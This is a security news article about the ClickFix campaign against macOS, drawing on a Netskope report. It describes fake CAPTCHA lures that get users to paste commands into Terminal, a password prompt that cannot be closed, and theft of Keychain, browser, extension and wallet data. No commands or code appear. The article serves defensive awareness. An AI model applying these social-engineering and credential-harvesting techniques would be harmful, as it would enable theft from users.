Ddos 
A sophisticated cross-platform social engineering campaign, dubbed ClickFix, has evolved to target macOS users with a relentless new infostealer. According to a recent report from Netskope Threat Labs, the campaign uses deceptive “technical support” lures to trick users into infecting their own machines, eventually holding their user interface hostage until they surrender their system password.
The attack begins when a user visits a compromised landing page. Using client-side JavaScript, the attackers filter victims by their “user-agent”. While mobile users are ignored, desktop users are funneled to a fake CAPTCHA or browser update page.The site then provides a malicious command, instructing the user to paste it into their Terminal.
As Netskope notes:
“ClickFix lures victims into manually copying and pasting a malicious command, typically into the Windows Run dialog or a terminal under the guise of a ‘browser update’ or ‘CAPTCHA verification'”.
Once executed, a background script silently establishes a staging directory and prepares for data exfiltration.
The most striking feature of the macOS payload is its credential harvesting method. The malware deploys an AppleScript-based dialog box that mimics a legitimate system prompt, complete with authentic macOS icons.
Unlike real system prompts, this one is non-closable. It uses a continuous loop to validate the user’s password in real-time via macOS Directory Services.
As the report highlights:
“If incorrect, the dialog immediately reappears, holding the UI hostage until a valid password is provided”.
By capturing the plaintext login password, attackers can easily decrypt the victim’s macOS Keychain, which contains saved passwords, Wi-Fi keys, and cryptographic certificates.
The infostealer is designed to be exhaustive. Once it has the system password, it harvests:
- 12 Chromium-based Browsers: Including Chrome, Edge, Brave, Arc, and Opera.
- 200+ Browser Extensions: Targeting password managers like LastPass and 1Password, as well as 2FA apps like Authy.
- Cryptocurrency Wallets: The script targets 16 standalone desktop wallets (such as Ledger Live, Exodus, and Atomic) and dozens of browser-based wallets like MetaMask and Phantom.
By stealing live session cookies, threat actors can “bypass multi-factor authentication (MFA) by hijacking active sessions to gain direct access to corporate and personal accounts”.
The latest versions of macOS Tahoe (26.4) and macOS Sequoia introduce a native Terminal security warning. This feature is specifically designed to disrupt ClickFix-style attacks by alerting users when they attempt to paste potentially harmful commands from an untrusted source.
Netskope researchers emphasize that while technical defenses are improving, “social engineering remains a primary threat”. Users are urged to remain vigilant and never execute Terminal commands provided by websites to “fix” browser errors.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
